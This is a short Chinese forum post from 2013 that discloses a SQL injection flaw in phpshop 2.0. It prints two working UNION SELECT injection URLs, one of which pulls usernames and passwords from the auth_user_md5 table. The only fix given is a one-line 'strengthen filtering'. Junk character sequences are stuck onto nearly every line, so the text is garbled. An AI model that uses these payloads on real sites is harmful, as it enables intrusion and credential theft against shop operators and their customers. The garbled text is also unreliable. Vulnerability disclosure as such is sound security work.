标题 : phpshop 2.0 SQL Injection Vulnerability/ h- Y h" f0 y9 ~' v L/ d
* C7 `. R- I6 e2 L& A7 @: n5 e作者 : By onestree0 H& B4 Q5 ]8 k4 a( l) ^! q& Z
下载地址 : http://code.google.com/p/phpshop/downloads/list
0 H' S2 n, M* a7 }3 R# R# U/ d测试地址: windows 7 / ubuntu6 T5 s: P) |" h" B
8 w; j+ W) s8 M
0 H2 _$ V/ c: x7 ~3 `2 q# vSQLi p0c:( |, G2 O2 t) |- _+ z
; ^" g; D; {3 ]) S9 R8 i
==================) v7 G' m3 ~: j, z
- ]' U* n7 E9 w( H; Thttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 d8 N. m6 V: q" f7 h
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --" q8 ~: P; j* r
0 a: T( {: C! ?
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--' }2 {* ^: `7 y" k
z& V- z1 u0 e
修复:
: A+ ?; F u7 |4 H加强过滤
- j V" Y, M1 e& X( e3 R6 S2 n! b' j( s9 p
! }1 X( l$ {% b" k) Z |
发表于 2013-1-18 18:24:10
收藏
支持
反对